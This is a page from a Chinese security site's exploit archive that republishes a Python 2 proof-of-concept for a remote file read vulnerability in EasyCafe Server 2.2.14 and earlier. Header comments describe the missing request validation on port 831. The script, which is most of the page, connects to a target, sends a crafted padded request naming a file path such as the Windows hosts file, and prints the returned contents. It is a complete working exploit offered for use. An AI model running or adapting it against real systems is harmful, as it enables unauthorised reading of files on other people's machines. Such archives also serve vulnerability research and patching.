首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EasyCafe Server 2.2.14 Remote File Read
来源:https://www.infogen.al/ 作者:R-73eN 发布时间:2015-12-28  
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrive a file because the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read access to the system.
#

import socket
#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
	data = s.recv(261) # Get header
	while data:
		data = s.recv(2048)
		print data
		
except Exception:
	print "[+] https://www.infogen.al/ [+]"
finally:			
	s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ovidentia Widgets 1.0.61 - Rem
·FTPShell Client 5.24 - Buffer
·Notepad++ NPPFtp Plugin 0.26.3
·KiTTY Portable <= 0.65.0.2p Ch
·Apache 2.4.17 - Denial of Serv
·KiTTY Portable <= 0.65.1.1p Lo
·Easy File Sharing FTP Server 3
·KiTTY Portable <= 0.65.0.2p Lo
·Pinger Remote Code Execution
·KiTTY Portable <= 0.65.0.2p Lo
·IBM Tivoli Storage Manager Fas
·Rejetto HTTP File Server (HFS)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved